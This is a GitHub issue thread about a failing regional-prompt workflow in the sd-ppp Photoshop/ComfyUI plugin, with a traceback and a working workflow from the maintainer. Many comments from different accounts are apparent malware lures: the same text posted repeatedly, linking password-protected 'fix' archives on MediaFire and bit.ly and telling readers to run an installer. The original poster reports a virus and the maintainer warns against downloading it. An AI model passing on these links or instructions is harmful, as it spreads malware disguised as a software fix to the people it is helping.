### ISSUE TITLE
Impossible to make regional prompt works with photoshop 2024+ comfyui + Flux

### ISSUE THREAD

**Issue by Elgokoo** [zombieyang/sd-ppp#38]
Hi,

Because the tutorial doesn't provide a workflow , I have tried to create mine with the example of the Orange / Strawberry / Apple, and the result is a merged image like you see below.

I have attached my workflow if you can provide a fix or a working workflow. 

**Thanks a lot for your help**

![ComfyUI_00335_](https://github.com/user-attachments/assets/7ee94bf4-173c-4b47-a2be-0d9b75788593)

[Photoshop regional.json](https://github.com/user-attachments/files/16755688/Photoshop.regional.json)

The log below could help :

WARNING: define_comfyui_nodes.<locals>.GetTextFromLayerNode.IS_CHANGED() got an unexpected keyword argument 'document'
WARNING: define_comfyui_nodes.<locals>.GetTextFromLayerNode.IS_CHANGED() got an unexpected keyword argument 'document'
WARNING: define_comfyui_nodes.<locals>.GetTextFromLayerNode.IS_CHANGED() got an unexpected keyword argument 'layer_or_group'
WARNING: define_comfyui_nodes.<locals>.GetTextFromLayerNode.IS_CHANGED() got an unexpected keyword argument 'layer_or_group'
WARNING: define_comfyui_nodes_legacy.<locals>.GetImageFromPhotoshopLayerNode.IS_CHANGED() got an unexpected keyword argument 'document'
WARNING: name 'layer' is not defined
WARNING: name 'layer' is not defined
!!! Exception during processing !!! 'NoneType' object is not subscriptable
Traceback (most recent call last):
  File "D:\ComfyUI\execution.py", line 317, in execute
    output_data, output_ui, has_subgraph = get_output_data(obj, input_data_all, execution_block_cb=execution_block_cb, pre_execute_cb=pre_execute_cb)
  File "D:\ComfyUI\execution.py", line 192, in get_output_data
    return_values = _map_node_over_list(obj, input_data_all, obj.FUNCTION, allow_interrupt=True, execution_block_cb=execution_block_cb, pre_execute_cb=pre_execute_cb)
  File "D:\ComfyUI\execution.py", line 169, in _map_node_over_list
    process_inputs(input_dict, i)
  File "D:\ComfyUI\execution.py", line 158, in process_inputs
    results.append(getattr(obj, func)(**inputs))
  File "D:\ComfyUI\custom_nodes\sd-ppp\sdppp_python\comfy_nodes_legacy.py", line 85, in get_image
    document = layer_or_group['document']
TypeError: 'NoneType' object is not subscriptable

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Elgokoo** [comment]
It's so weird, your fix has a virus. 

And can you please give me the instruction to fix it  please ?

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by zombieyang** [comment]
> It's so weird, your fix has a virus.
> 
> And can you please give me the instruction to fix it please ?

please don't download that, I don't know him.

**Comment by ESMELSTEPHANE24** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Elgokoo** [comment]
thanks for.your feedback,

I have already paste my custom workflow

https://github.com/user-attachments/files/16755688/Photoshop.regional.json

Thanks for.all what you doing and help

**Comment by zombieyang** [comment]
great, I've just get off work.
[240827 workflow+psd.zip](https://github.com/user-attachments/files/16760429/240827.workflow%2Bpsd.zip)

**Comment by Elgokoo** [comment]
**Oh Amazing, it works on dreamshaper Turbo, perfect, thanks a lot** 

Now I will try to make it work on "flux", but still unsure

PS : It would be great id the Readme is updated with these workflow to be sure this solution benefit for all

**Comment by zombieyang** [comment]
> **Oh Amazing, it works on dreamshaper Turbo, perfect, thanks a lot**
> 
> Now I will try to make it work on "flux", but still unsure
> 
> PS : It would be great to update the Readme and workflow folder with these workflow to be sure this solution benefit for all

great!

the package above included a flux workflow (steel plate). Actually the biggest advanced of sdppp is that it only focus on getting/sending data so It won't confict with any other custom node.

All the sample workflows and psd is uploaded to my Discord already.

**Comment by marcosj046** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by SupunDevendra** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by Vomgnar** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
